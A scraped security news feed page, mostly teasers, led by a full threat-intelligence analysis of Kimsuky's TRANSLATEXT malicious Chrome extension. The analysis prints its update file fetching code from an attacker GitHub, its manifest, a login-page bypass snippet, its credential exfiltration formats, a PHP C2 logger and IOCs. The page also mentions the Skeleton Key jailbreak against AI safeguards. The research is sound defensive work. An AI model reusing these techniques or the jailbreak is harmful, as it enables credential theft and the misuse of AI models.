Reading Time: 5 min Third-party cookies on your Mac can track your browsing and expose you to cybersecurity threats. Learn the risks and how to browse safely!

The post What Are the Cybersecurity Threats When Allowing Third-Party Cookies on Mac? appeared first on Security Boulevard.

AI promises considerable benefits however there’s still a lot of confusion surrounding the topic, particularly around the terms generative AI and predictive AI.

The post Generative AI vs. Predictive AI: A Cybersecurity Perspective appeared first on Security Boulevard.

For two decades or so now, web applications have been the backbone of many businesses, making their security paramount. Dynamic Application Security Testing (DAST) and penetration testing are crucial for identifying and mitigating security vulnerabilities in web application security. While both aim to enhance application security, they differ significantly in their approach, execution, and outcomes. …

DAST Vs. Penetration Testing: Comprehensive Guide to Application Security Testing Read More »

The post DAST Vs. Penetration Testing: Comprehensive Guide to Application Security Testing appeared first on Security Boulevard.

NERC-CIP aims to secure and manage the security of the Bulk Electric System (BES) in North America. At the request of the Federal Energy Regulatory Commission (FERC), NERC completed an INSM study to analyze the risks associated with a lack…

The post How LogRhythm Helps You Comply with NERC CIP-015-01 appeared first on LogRhythm.

The post How LogRhythm Helps You Comply with NERC CIP-015-01 appeared first on Security Boulevard.

Weekly Threat Intelligence Report

Date: June 28, 2024

Prepared by: David Brunsdon, Threat Intelligence - Security Engineer, HYAS

Recently a Chinese company named Funnull purchased the domain (polyfill.io) and github of an open source javascript library used in over 100,000 websites.

https://sansec.io/research/polyfill-supply-chain-attack

Polyfill allows website creators to maintain support for a variety of older browser types, however its operation has changed to include redirecting mobile devices to sports betting using a fake google analytics domain (www.googie-anaiytics.com).

For users of HYAS Protect, HYAS disables DNS resolutions that would lead to these redirects and other potential compromises. DNS is the ideal place to block potentially malicious CDNs, like we have here. Other vendors, such as Cloudflare, have also responded by rewriting any Polyfill code to redirect to their own cached copy of the javascript library. Today, Namecheap, the provider of the domain, has taken it over and removed the A record and completely disabling the threat.

Oddly enough, Funnull has denied the existence of any supply chain attack, and has registered a new domain, polyfill[.]com which is described on the web page as “A free CDN for open source projects.”

Supply chain attacks through open source products remain a serious attack vector. In this situation the original maintainer sold control to another company that appears to have a malicious intent. Situations like these have the potential to impact a large number of individuals and organizations and this type of potential compromise should always be considered a part of an organization's threat model.

HYAS threat intelligence will continue to monitor the situation and will adapt our security solution as required.

Security analysts interested in researching their own network telemetry for compromise should focus on outbound connections to the following domains:

cdn.polyfill[.]io
www.googie-anaiytics[.]com
polyfill[.]com

The new domain, polyfill[.]com has not been known to be used with any malicious behavior but the concern remains about how it could be used in the future, as it’s still under the control of Funnull, who has denied the existence of the supply chain attack. 

As always, the HYAS Threat Intelligence team is at the ready. If you’d like to speak with one of our experts, please reach out to us, and we’d be happy to help. 

Want more threat intel on a weekly basis?
Follow HYAS on LinkedIn
Follow HYAS on X

Read past reports:
Tracking an Active Remcos Malware Campaign

Revealing LOTL Techniques Used by An Active Remcos Malware Campaign

Agent Tesla Unmasked: Revealing Interrelated Cyber Campaigns

Risepro Malware Campaign On the Rise

Sign up for the free HYAS Insight Intel Feed

Learn More About HYAS Insight

An efficient and expedient investigation is the best way to protect your enterprise. HYAS Insight provides threat and fraud response teams with unparalleled visibility into everything you need to know about the attack.This includes the origin, current infrastructure being used and any infrastructure.

Read how the HYAS Threat Intelligence team uncovered and mitigated a Russian-based cyber attack targeting financial organizations worldwide.

More from HYAS Labs

Polymorphic Malware Is No Longer Theoretical: BlackMamba PoC.

Polymporphic, Intelligent and Fully Autonomous Malware: EyeSpy PoC.

Five Proven Techniques to Optimize Threat Intelligence

Leveraging ASNs and Pivoting to Uncover Malware Campaigns

Disclaimer: This Threat Intelligence Report is provided “as is” and for informational purposes only. HYAS disclaims all warranties, express or implied, regarding the report’s completeness, accuracy, or reliability. You are solely responsible for exercising your own due diligence when accessing and using this Report's information. The analyses expressed in this Report reflect our current understanding of available information based on our independent research using the HYAS Insight platform. The Report’s inclusion of any companies, organizations, or ASNs does not imply any wrongdoing on their part; it is simply an indication of where digital threat activities have been observed. HYAS reserves the right to update the Report as additional information is made known to us.

The post HYAS Protects Against Polyfill.io Supply Chain Attack with DNS Safeguards appeared first on Security Boulevard.

Crypto-Agility Required to Migrate to a New Certificate Authority (CA) Seamlessly and Highlights Need for Post-Quantum Cryptography (PQC) Readiness This week Google announced that the Google Chrome browser will no longer trust TLS certificates issued by the Entrust Certificate Authority (CA) starting November 1, 2024. Certificates issued by Entrust before October 31, 2024 will remain […]

The post Attention: Google To Distrust Entrust TLS Certificates appeared first on Security Boulevard.

A threat group dubbed Unfurling Hemlock infects targeted campaign with a single compressed file that, once executed, launches a 'cluster bomb' of as many as 10 pieces of malware that include loaders, stealers, and backdoors.

The post Unfurling Hemlock Tossing ‘Cluster Bombs’ of Malware appeared first on Security Boulevard.

Authors/Presenters:Xinben Gao, Lan Zhang

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

The post USENIX Security ’23 – PCAT: Functionality and Data Stealing from Split Learning by Pseudo-Client Attack appeared first on Security Boulevard.

Episode 0x7A 4-peat 4-peat! Turns out this is actually habit forming. The weekly venting/ranting is excellent for the spirit! Hope you’re able to vent as well. Feel free to scream while listening – it’s not weird at all. Upcoming this week… Lots of News Breaches SCADA / Cyber, cyber… etc. finishing it off with DERPs/Mailbag […]

The post Liquidmatrix Security Digest Podcast – Episode 7A appeared first on Liquidmatrix Security Digest.

The post Liquidmatrix Security Digest Podcast – Episode 7A appeared first on Security Boulevard.

Permalink

The post Randall Munroe’s XKCD ‘Situation’ appeared first on Security Boulevard.

Authors/Presenters:Nicholas Carlini, Jamie Hayes, DeepMind; Milad Nasr Matthew Jagielski, Vikash Sehwag, Florian Tramèr, Borja Balle, Daphne Ippolito, Eric Wallace

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

Permalink

The post USENIX Security ’23 – Extracting Training Data from Diffusion Models appeared first on Security Boulevard.

Chinese fast-fashion-cum-junk retailer “is a data-theft business.”

The post Temu is Malware — It Sells Your Info, Accuses Ark. AG appeared first on Security Boulevard.

Microsoft details Skeleton Key, a new jailbreak technique in which a threat actor can convince an AI model to ignore its built-in safeguards and respond to requests for harmful, illegal, or offensive requests that might otherwise have been refused.

The post Skeleton Key the Latest Jailbreak Threat to AI Models: Microsoft appeared first on Security Boulevard.

If you’ve been part of a network segmentation or Zero Trust architecture planning project or a data center or application migration initiative, the following scenario probably rings true.

The post The Eureka Moment: Discovering Application Traffic Observability appeared first on Netography.

The post The Eureka Moment: Discovering Application Traffic Observability appeared first on Security Boulevard.

Get details on what ASPM is, the problems it solves, and what to look for.  

The post What Is Application Security Posture Management (ASPM): A Comprehensive Guide appeared first on Security Boulevard.

Explore insights from CloudNativeSecurityCon 2024, including securing machine identities, digesting SLSA and GUAC, and the impact of quality documentation.

The post Elevating Cloud Security: Highlights from CloudNativeSecurityCon 2024 appeared first on Security Boulevard.

Insight #1

The post Cybersecurity Insights with Contrast SVP of Cyber Strategy Tom Kellermann | 6/28 appeared first on Security Boulevard.

HashiCorp Vault is a robust and versatile open-source solution for comprehensive secrets management and data protection. At its core, HashiCorp Vault excels in securely storing and managing sensitive information, employing dynamic secrets to minimize the risk of long-lived credentials. Its flexible authentication methods, ranging from tokens and LDAP to username/password, empower organizations to implement strong […]

The post AppViewX AVX ONE Certificate Lifecycle Management Integration With HashiCorp Vault appeared first on Security Boulevard.

The implementation of DDoS attack alerting relies on setting alert thresholds. Setting the threshold too high may result in false negatives, while setting it too low may lead to a high number of false positives. Therefore, it is crucial to establish appropriate thresholds. NTA provides automatically learn, record, and analyze network traffic from the IP […]

The post Introduction to NTA Auto-learning Function appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

The post Introduction to NTA Auto-learning Function appeared first on Security Boulevard.

Navigating the landscape of customer interactions is a delicate balancing act that requires constant calibration between security and operability (or usability, if speaking from a customer’s perspective).

The post How to Enhance Security Without Affecting the Customer Experience appeared first on Security Boulevard.

Let’s examine why so many applications remain vulnerable despite high-severity warnings and how to minimize the threat to your organization.

The post The Urgency to Uplevel AppSec: Securing Your Organization’s Vulnerable Building Blocks appeared first on Security Boulevard.

The rate of cyberattacks is rising as the threat level continues to evolve, according to BlackBerry Limited’s latest Global Threat Intelligence Report.

The post Cyberattack Rate Surges as Novel Malware Growth Accelerates appeared first on Security Boulevard.

IntroductionIn March 2024, Zscaler ThreatLabz observed new activity from Kimsuky (aka APT43, Emerald Sleet, and Velvet Chollima), an advanced persistent threat actor backed by the North Korean government. This group, first observed in 2013, is notorious for cyber espionage, and financially motivated cyber attacks, primarily targeting South Korean entities, including think tanks, government institutions, and the academic sector. They employ various tactics, techniques, and procedures (TTPs) in their targeted campaigns and one of their distribution methods is malicious Google Chrome extensions. In July 2022, it was reported that Kimsuky used malicious Chrome extensions to target users in the U.S., Europe, and South Korea. While actively monitoring this group, we discovered an instance where Kimsuky used a new Google Chrome extension, which we named “TRANSLATEXT”, for cyber espionage. TRANSLATEXT is specifically leveraged to steal email addresses, usernames, passwords, cookies, and captures browser screenshots.Key TakeawaysKimsuky uploaded TRANSLATEXT to their attacker-controlled GitHub repository on March 7, 2024.TRANSLATEXT can bypass security measures for several prominent email service providers like Gmail, and Kakao and Naver (popular in South Korea) to steal information.TRANSLATEXT is specifically leveraged to steal email addresses, usernames, passwords, cookies, and captures browser screenshots.Our research suggests that the main targets of this attack were in the South Korean academic field, specifically those involved in political research related to North Korean affairs. Technical AnalysisAccording to a recent publication by a South Korean security vendor, Kimsuky delivered an archive file named “한국군사학논집 심사평서 (1).zip”, which translates to "Review of a Monograph on Korean Military History." The archive contains two decoy files: HWP documents (a popular office file format in South Korea) A Windows executable masquerading as related documents When a user launches the executable, the malware retrieves a PowerShell script from the threat actor’s server. The figure below shows the Kimsuky infection chain.Figure 1: Example Kimsuky infection chain.The PowerShell script from the remote server is responsible for uploading general information about the victim and creating a Windows shortcut that retrieves an additional PowerShell script from the same server. During our own research into this campaign, we discovered another PowerShell script with the MD5 hash: bba3b15bad6b5a80ab9fa9a49b643658 and a GitHub account used by the script linked to the same actor. From this newly discovered GitHub account, we observed victim data and a previously deleted Chrome extension utilized by the actor. The delivery method for TRANSLATEXT is not currently known.However, the newly discovered PowerShell script reveals that Kimsuky checked for the presence of installed Chrome extensions using the Windows registry key shown below: HKCU\Software\Policies\Google\Chrome\ExtensionInstallForcelistThis registry key is used by Chrome to enforce the installation of specified extensions without user permission or intervention. Therefore, it appears Kimsuky registered TRANSLATEXT in this registry key using previous stage methods.TRANSLATEXT analysisIn the attacker-controlled GitHub account, we observed an XML file in addition to TRANSLATEXT. These files were present in the repository on March 7, 2024, and deleted the next day, implying that Kimsuky intended to minimize exposure and use the malware for a short period to target specific individuals. The figure below shows how Kimsuky uploaded the files on March 7th to one of their GitHub accounts and then deleted them on March 8th.Figure 2: Kimsuky GitHub commit log shows the addition and removal of an XML file and TRANSLATEXT after only one day.A timeline of the GitHub user’s activity is listed below:February 13, 2024: Join GitHubMarch 7, 2024: Created first repository named “motorcycle”29 commits including uploads from the victim and subsequent removals.Added TRANSLATEXT files: update.xml, GoogleTranslate.crxMar 8, 2024: Removed update.xml and GoogleTranslate.crxMar 18, 2024: Created motorcycle/calcApr 4, 2024: Created a motorcycle/laxi/ter.txt that contains “sfsadfsadfa”. As the name suggests, the update.xml file contained the parameters necessary for updating TRANSLATEXT as shown below.<?xml version='1.0' encoding='UTF-8'?>
<gupdate xmlns='http://www.google.com/update2/response' protocol='2.0'>
<app appid='gibabegbpcndhaoegbalnmgkeoaopajp'>
<updatecheck codebase='hxxps://github[.]com/cmastern/motorcycle/raw/main/GoogleTranslate.crx' version='1.5.2' />
</app>
</gupdate>TRANSLATEXT was uploaded to GitHub as “GoogleTranslate.crx”, and masqueraded as a Google Translate extension. However, TRANSLATEXT actually contained four malicious Javascript files for bypassing security measures, stealing email addresses, credentials, cookies, capturing browser screenshots, and exfiltrating stolen data. The figure below depicts the role of each Javascript file in stealing and sending information to the C2 server.Figure 3: Kimsuky TRANSLATEXT architecture.According to the manifest.json file, the author name is listed as “Piano”, and the update_url points to another GitHub address referencing an update.xml file that did not exist at the time of our analysis. The description and default title fields contain Korean, which likely indicates that this campaign was specifically targeting South Korea–we discuss this later in the blog.A part of the manifest.json file is shown below.{
// Required
"author": "Piano",
"manifest_version": 3,
"name": "Google Translate",
"version": "1.5.2",

// Recommended
"action": {
"default_icon": "icons/16.png",
"default_title": "번역하려면 마우스 왼쪽 버튼을 클릭하세요."
},
"description": "웹을 탐색하면서 편하게 번역을 볼 수 있습니다. 이 기능은 Google 번역팀에서 제공합니다.",
"icons":{
"16": "icons/16.png",
"19": "icons/19.png",
"32": "icons/32.png",
"38": "icons/38.png",
"48": "icons/48.png",
"128": "icons/128.png"
},
"update_url": "https://raw.githubusercontent.com/HelperDav/Web/main/update.xml",

// Optional
"background": {
"service_worker": "background.js"
},
"content_security_policy": {
"extension_page": "script-src 'self' 'wasm-unsafe-eval'; object-src 'self'"
},
"permissions": ["tabs", "activeTab", "cookies", "storage", "downloads", "scripting"],
The TRANSLATEXT manifest requests excessive permissions such as scripting. This broad permission allows TRANSLATEXT to inject scripts into web pages, enabling it to modify page content, add functionality, and/or interact with the page's elements.Depending on the URL the victim visits, a corresponding script is launched. When the victim visits the Naver login page (nid.naver.com/*) or the Kakao login page (accounts.kakao.com/*), the auth.js file is injected into the web page. Similarly, when visiting the Gmail login page (mail.google.com/), the gsuit.js file is injected into the web page. The content.js script is injected into all web pages using the manifest file as shown below."content_scripts": [
{
"js": [ "content.js"],
"matches": [
"http://*/*", "https://*/*"
],
"run_at": "document_idle",
"all_frames": false
},
{
"js": [ "auth.js"],
"matches": [
"https://nid.naver.com/*",
"https://accounts.kakao.com/*"
],
"run_at": "document_end",
"all_frames": false
},
{
"js": [ "gsuit.js"],
"matches": [
"https://mail.google.com/*"
],
"run_at": "document_end",
"all_frames": false
}
]Security bypassThe script injected into the web page is responsible for bypassing security measures on each specific login page. Note: For security reasons, we've replaced sensitive variable names in the script to prevent unauthorized actors from exploiting these methods. The gsuit.js script searches for all <div> elements with the specific class name in the web page and then removes them from the Document Object Model (DOM) as shown below."use strict";
function NeverNotify()
{
var x = document.querySelectorAll("[redacted]");
for(var i=0; i<x.length; i++)
{
if(x[i])
{
x[i].remove();
}
}
}
setInterval(() => {NeverNotify();}, 50);The auth.js script is used for manipulating security measures for Naver and Kakao. To bypass Kakao, the script checks for elements with specific IDs. If these elements exist, the script clicks them. This action typically means opting to remember the browser to avoid repeated security prompts. The script selects all elements and ensures their class names are set correctly, possibly to ensure all checkboxes of this type are checked. The Naver section of the script, similar to the Kakao section, identifies elements with specific IDs and performs clicks on them. These clicks serve various purposes, such as skipping or acknowledging waiting times and dialogs within Naver's security measure process. For instance, it locates an element with the ID auto and sets its value to init, potentially as part of a setup or initialization process for the authentication page. Note: We have notified the Google and Naver security teams about these security bypasses and are closely working with them to mitigate the issue.Email address stealer - content.jsThe main objective of this Javascript file is to collect email address and password data entered into the forms and send the information to a background page. The script performs these actions as follows:Hooking into various form elements such as buttons and input fields to capture clicks and keypresses to initiate sending data.Collecting all email addresses entered into any input fields (“type=email”), general text (“type=text”), or textboxes (“role=textbox”), and concatenating them into a single string. Collecting values from all input fields of the type password, and concatenating the email address and password data collected into a string format suitable for transmission.Monitoring user actions, like pressing Enter, by adding event listeners to various button types and input fields. It uses a mutex variable to prevent multiple transmissions at the same time. This monitoring process is repeated every 500 milliseconds, ensuring new elements on the page or dynamically added elements are also monitored.Service worker - background.jsThe Javascript employs the dead drop resolver technique to retrieve configurations and commands from the public blog service: hxxps://onewithshare.blogspot[.]com/2023/04/10.htmlIf the blog URL is active, the Javascript extracts the pattern with the following regular expression: <input name="${name}" type="hidden" value="(.*?)"> This parses the content from the value parameter of a hidden input field. When we checked the threat actor’s blog, there were no relevant values present in this format. There are four types of commands expected by the code, and they are described in the table below:CommandDescriptionURLParses and Base64 decodes the value and appends /log.php. This newly formed URL is used as a new C2 server.CaptureWhen a new tab is created, the code sends the current time and URL of the tab, taking a screenshot of the tab with chrome.tabs.captureVisibleTab API every 5 seconds.delcookieRemoves all cookies from the browser.RunInjects a <a> tag with the href value ms-powerpoint:// in all Chrome tabs, invoking the click event every 30 minutes.Table 1: Commands supported by Kimsuky’s TRANSLATEXT.The background script also registers several listeners with specific functionality as described below:Send background Javascript listener: This listener is triggered when a new message is created, allowing for appropriate actions to be taken in response.Tab update listener: When a tab is updated, this listener sends the URL of the newly created tab along with a screenshot, based on the presence of the Capture flag.Cookie change listener: Whenever a cookie is modified, this listener checks if the domain includes google, naver, kakao, or daum, and if the reason for the change is expired, evicted, or explicit. In such cases, the new cookie value is sent to the remote C2 server.TRANSLATEXT uses HTTP POST requests for C2 communications, with the following hardcoded HTTP headers:Accept: application/json, application/xml, text/plain, text/html, *.*,
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Access-Control-Allow-Origin: "*"
Access-Control-Allow-Credentials: trueTRANSLATEXT uses the following HTTP POST fields for sending the stolen information.Data to SendPOST Data FormatEmail/passwordevent=[current time]-->event=[url]event=email=[email]**pwd=[passwd] New tab imagetab=[current time]-->tab=[url]image=[image data]&url=[tab url]Cookie (send all cookies)cookie=[current time]-->cookie=[all cookie value]Cookie (cookie changed)cookie={expired|evicted|explicit}:[current time]-->cookie=[cookie value]Table 2: HTTP POST data format for Kimsuky’s TRANSLATEXT.VictimsThe data stolen by the threat actor included browser login data and cookies. One of the victims is in the education sector in South Korea. Based on this gathered information, we surmise that academic researchers specializing in the Korean peninsula, particularly those engaged in geopolitical matters involving North Korea, are among the primary targets of this campaign. Threat AttributionConsidering the C2 characteristics and victimology, we attribute this attack to the Kimsuky group with medium confidence. C2 server characteristicsFrom the threat actor's server, we discovered the presence of a b374k webshell (hxxps://webman.w3school.cloudns[.]nz/config.php) used for exfiltrating stolen information. The Kimsuky group has a history of frequently utilizing the b374k webshell.Furthermore, the main page of the threat actor's server redirects clients to the legitimate Gmail page when they connect without any parameters. This behavior aligns with the characteristic C2 configuration of the Kimsuky group. This redirection to well-known and trusted services like Gmail, Naver, or Kakao helps to lower suspicion and avoid sending informative configurations. As an example below, we show an old PHP script from the Kimsuky group's C2 server that captures the client's IP address and redirects the client's connection to Gmail using the Location header.<?php
date_default_timezone_set('Asia/Seoul');
$Now_time = time();
$date = date("Y-m-d-h-i-s-A",$Now_time);
$ip = getenv("REMOTE_ADDR");
if(isset($_GET['ip'])){
$szfilename = "allow.txt";
$pfile = fopen($szfilename,"ab");
$res= $_GET['ip'] . "\r\n" ;
fwrite($pfile,$res);
fclose($pfile);
exit;
}
$szfilename = "error.txt";
$pfile = fopen($szfilename,"ab");
$res= $date . "-" . "\r\n".$ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n";
fwrite($pfile,$res);
fclose($pfile);
header('Location: https://mail.google.com');
?>Employing “r-e.kr” domainsFrom the newly discovered PowerShell script, we found that the actor used the domain "r-e[.]kr" to host the malicious PowerShell scripts. The r-e.kr domain was registered by a Korean ISP named “viaweb”. Domain itemDetailsDomain Namer-e.krRegistranthyon jin parkAdministrative Contact (AC)Hyonjin ParkAC E-Mail Registered Date2014. 03. 22.Last Updated Date2022. 11. 22.Expiration Date2025. 03. 22.PublishesNAuthorized Agencyviaweb(http://viaweb.co.kr)Table 3: Kimsuky domain details.Historically, the Kimsuky group has frequently abused this domain, according to other security vendors. In addition to the r-e.kr domain, they have used similar domains registered with the same provider, such as p-e.kr and o-r.kr. While the overlap of specific domains is common, these types of domains are not well-known, and we believe that only a few threat actors prefer using them.VictimologyDuring our research, we identified a specific victim of this attack, an academic with a keen interest in geopolitical issues pertaining to the Korean peninsula. One of the primary objectives of the Kimsuky group is to conduct surveillance on academic and government personnel in order to gather valuable intelligence. Hence, the characteristics exhibited by this campaign are consistent with the intentions of Kimsuky.ConclusionOur research indicates that malicious Google Chrome extensions continue to be leveraged by Kimsuky. The group appears to be targeting academia in South Korea as part of an ongoing intelligence collection campaign. To mitigate the risk from active North Korea-affiliated threat actors like Kimsuky, it is imperative to stay informed about their latest tactics. Additionally, exercising caution when installing programs from untrusted sources is essential in maintaining security and preventing potential breaches.Zscaler CoverageZscaler’s multilayered cloud security platform detects indicators related to TRANSLATEXT at various levels with the following threat names:Win32.Backdoor.Cobaltstrike.LZJS.Trojan.KimsukyPS.Trojan.KimsukyIndicators Of Compromise (IOCs)IndicatorsDescriptionbba3b15bad6b5a80ab9fa9a49b643658PowerShell script (tys.txt).38e27983c757374d9bae36a2e2520e8eTRANSLATEXT (GoogleTranslate.crx).hxxp://sdfa.liveblog365[.]com/ares/hades.txtPowerShell script download URL.hxxp://sdfa.liveblog365[.]com/ares/babyhades.txtPowerShell script download URL.hxxp://ney.r-e[.]kr/mar/tys.txtScript download URL.hxxp://ney.r-e[.]kr/mar/tys.phpScript download URL.hxxps://webman.w3school.cloudns[.]nzC2 domain to exfiltrate data.hxxps://onewithshare.blogspot[.]com/2023/04/10.htmlBlog for dead drop resolver.hxxps://raw.githubusercontent[.]com/HelperDav/Web/main/update.xmlThreat actor’s GitHub.hxxps://github[.]com/cmasternThreat actor’s GitHub. MITRE ATT&CK FrameworkIDTacticDescriptionT1059.001Command and Scripting Interpreter: PowerShellThreat actor uses PowerShell script to collect general system information, and uploads it to GitHub.T1176Browser ExtensionsThreat actor utilizes TRANSLATEXT for exfiltration and persistence.T1555.003Credentials from Password Stores: Credentials from Web BrowsersThreat actor exfiltrates credentials stored in the browser to GitHub.T1113Screen CaptureTRANSLATEXT captures new browser tabs.T1071.001Application Layer Protocol: Web ProtocolsHTTP protocol to fetch the payload and then upload exfiltrated data.T1102.001Web Service: Dead Drop ResolverTRANSLATEXT receives commands from the legitimate blog post.T1041Exfiltration Over C2 ChannelSends collected email address and password through C2 channel.

The post Kimsuky deploys TRANSLATEXT to target South Korean academia appeared first on Security Boulevard.

Some WAFs in the market offer rate limiting features designed to stop automated API attacks. They do this by implementing a centralized control plane with shared state and counters in the cloud to enable over time detections. However, these solutions still struggle with the unique challenges posed by API attacks, leaving customers frustrated enough to post about in on reddit:

The problem with many WAFs is that they are not architected to handle high volumetric attacks because they are over-reliant on a cloud control plane. Let's take an example of a typical legacy agent based WAF based on this type or architecture:

Cloud based detections are too slow

First, WAF agents rely on the cloud to detect attacks.  WAF agents are thin clients - they run some basic detections and then forward metadata to the cloud in order to optimize for performance and latency.  However, this approach means that any behavioral based detections (again, going back to the credential stuffing example) can only be detected in the cloud, and not locally at the agent because the agent does not have state or awareness of what is happening.  Attackers can take advantage of this type of system by sending attacks in at high rates in a distributed manner, getting in high volumes of attacks before the agents can check in with the cloud.

The Cloud is a single point of failure

Second, legacy agents have a single point of failure when it comes to detection - the cloud.  Because all the state is stored in the cloud, if the cloud goes down then all behavioral based detections stop working as well, as does any blocking and threat mitigation of these types of attacks.

Impart has decentralized the agent

We designed Impart from the ground up to solve these problems using a next generation decentralized architecture - an agent mesh.  Unlike traditional distributed systems which utilize a hub and spoke architecture (centralized control plane, distributed data plane), Impart is designed as a completely decentralized system that does not require a central control plane.

Instead of using centralized cloud communications to share and distribute state, our agents can share state directly with each other, as well as with the cloud.  The agents can also elect a leader to check in with the cloud so that not every agent has to update the cloud with the shared state, which is more efficient from a load perspective.

‍

What this means for security teams is two things:

Faster detection and response

First, Impart is able to detect and respond to attacks much more quickly than solutions based on legacy agents because we are not reliant on a round trip check in with the cloud to share state. In the example provided above, when a single inspector (our agent) detects an attack, it immediately shares this information with other agents in it's group. This allows all the agents to know when a single agent is experiencing an attack, and drastically reduces the time to detect an attack such as credential stuffing.

This matters in the real world.  Credential stuffing attacks are typically rapid, with attackers using off-the-shelf automation tools to generate and send numerous requests in a short time. Speed of detection is crucial in these scenarios.  In a recent deployment, Impart was deployed alongside a legacy agent based WAF and found that the it was not identifying or respond to prolonged attacks quickly enough. Thousands of credential stuffing attacks per hour slipped through before the  legacy agent based WAF could react, whereas Impart identified and acted on these attacks almost immediately.

Improved resilience and availability

Second, Impart is able to withstand an outage to the cloud without impacting behavioral detections, or reporting and analytics.  If the cloud has a problem, detections continue with all relevant metrics being captured and shared amongst all of the agents.  Whenever the cloud returns to normal, all of that shared state can be backfilled by the agents to the cloud, or sent locally by those agents to the customer's SIEM. This matters because most enterprises don't want to pin the reliability of their security tooling to the reliability of a single cloud provider. With this type of architecture, a customer's detection and response capabilities remain intact no matter what is going on in their WAF's control plane.

Reflecting on our journey at Impart, it's clear that the landscape of API security requires innovative solutions. Traditional WAFs, with their cloud-dependent architectures, simply can't keep up with the fast-paced, automated nature of modern API attacks. Our distributed control plane approach not only accelerates detection and response times but also ensures resilience even during cloud outages. It's been incredibly rewarding to see how our solution makes a real difference in protecting businesses from API threats.

If you want to learn more about our unique approach, sign up for a demo today!

‍

‍

‍

Subscribe to newsletter

Want to learn more about API security? Subscribe to our newsletter for updates.

Thank you! Your submission has been received!

Oops! Something went wrong while submitting the form.

The post Why WAF Rate Limiting isn’t Enough | Impart Security appeared first on Security Boulevard.

Waltham, Mass., June 27, 2024, CyberNewsWire — Infinidat, a leading provider of enterprise storage solutions, has introduced a new automated cyber resiliency and recovery solution that will revolutionize how enterprises can minimize the impact of ransomware and malware attacks.… (more…)

The post News Alert: Infinidat introduces advanced cyber resiliency and recovery solution for enterprises first appeared on The Last Watchdog.

The post News Alert: Infinidat introduces advanced cyber resiliency and recovery solution for enterprises appeared first on Security Boulevard.

2 min read Sticky note security now plagues application and service connections, necessitating a shift to more mature workload access safeguards.

The post How to Advance Breach Protection Against Non-Human Identity Threats in Workloads appeared first on Aembit.

The post How to Advance Breach Protection Against Non-Human Identity Threats in Workloads appeared first on Security Boulevard.

How to secure Microsoft Copilot & Gen AI July 10, 1:00 pm Eastern Time As organizations rapidly adopt Microsoft Copilot...

The post Webinar: How to secure Microsoft Copilot & Gen AI appeared first on Symmetry Systems.

The post Webinar: How to secure Microsoft Copilot & Gen AI appeared first on Security Boulevard.

Despite advances in technology and methodologies, the costs associated with fixing bad code continue to escalate, impacting businesses financially and operationally. But what is bad code, what are the clear markers of its negative impact, and how can organizations overcome it?

The post The True Cost of Bad Code in Software Development appeared first on Security Boulevard.

Container security is crucial in the age of microservices and DevOps. Learn about common container vulnerabilities, container security scanning, and popular tools to secure your containers in this comprehensive guide.

The post Container Security Scanning: Vulnerabilities, Risks and Tooling appeared first on Security Boulevard.

Authors/Presenters:Karola Marky, Shaun Macdonald, Yasmeen Abdrabou, Mohamed Khamis

Many thanks to USENIX for publishing their outstanding USENIX Security ’23 Presenter’s content, and the organizations strong commitment to Open Access.
Originating from the conference’s events situated at the Anaheim Marriott; and via the organizations YouTube channel.

Permalink

The post USENIX Security ’23 – In the Quest to Protect Users from Side-Channel Attacks — A User-Centred Design Space to Mitigate Thermal Attacks on Public Payment Terminals appeared first on Security Boulevard.

By now, you’ve likely seen the LinkedIn posts, the media stories, and even some formerly-known-as “Tweets”: The latest exploit to hit front pages is the malicious use of polyfill.io, a popular library used to power a large number of web browsers. As per usual, there’s a ton of speculation about what’s happening. Is this the […]

The post Third-Party Trust Issues: AppSec Learns from Polyfill appeared first on OX Security.

The post Third-Party Trust Issues: AppSec Learns from Polyfill appeared first on Security Boulevard.

Permalink

The post Daniel Stori’s ‘Java Attacks!’ appeared first on Security Boulevard.

Meta Description: Discover how data-centric security supports the hybrid cloud strategy of Cloudera Data Platform users. Learn about the benefits of hybrid cloud, data management, and secure data sharing.

The post Boost Hybrid Cloud Strategy with Cloudera and comforte’s Data-Centric Security appeared first on Security Boulevard.

VMware, the virtualization technology giant owned by Broadcom, has recently released a security advisory addressing several critical vulnerabilities discovered in its vCenter Server application. Read on to learn more.  Tell me more about VMware vCenter RCE vulnerability  If left unpatched, these vulnerabilities could allow malicious actors to execute remote code or escalate privileges on affected systems. As vCenter Server serves ... Read More

The post VMware vCenter RCE Vulnerability: What You Need to Know appeared first on Nuspire.

The post VMware vCenter RCE Vulnerability: What You Need to Know appeared first on Security Boulevard.

With the introduction of PCI DSS 4.0, merchants are now grappling with new requirements that aim to enhance the security of cardholder data. At a recent roundtable hosted by Source Defense, industry veterans gathered to dissect these changes and their implications for businesses of all sizes.

The post Polyfill – Additional Analysis and Discovery: Signs of PII and Credential Harvesting, Broad Exposure through Digital Supply Chain appeared first on Source Defense.

The post Polyfill – Additional Analysis and Discovery: Signs of PII and Credential Harvesting, Broad Exposure through Digital Supply Chain appeared first on Security Boulevard.

Over the last month, several large organizations suffered from major cybersecurity breaches involving stolen credentials....

The post Identity Gaps: The Need to Use Both x.509 & FIDO appeared first on Axiad.

The post Identity Gaps: The Need to Use Both x.509 & FIDO appeared first on Security Boulevard.

Ensuring the security of your customers’ and partners’ data is paramount in today’s digital environment. That’s why Service Organization Control 2 (SOC 2®) compliance has emerged as a widely recognized cybersecurity audit framework. SOC 2® reporting has been adopted by more businesses to demonstrate their commitment to strong cybersecurity practices. Let’s explore what a SOC 2® report...

The post A Step-by-Step Guide to Getting a SOC 2® Report appeared first on Hyperproof.

The post A Step-by-Step Guide to Getting a SOC 2® Report appeared first on Security Boulevard.

Certificates are dynamic security solutions within PKI, crucial for verifying identities and encrypting communications. Understanding their lifecycle is vital to prevent mismanagement. Learn about lifecycle stages, the impact of reduced validity periods, and the benefits of automated management.

The post The Evolving SSL/TLS Certificate Lifecycle & How to Manage the Changes appeared first on Security Boulevard.

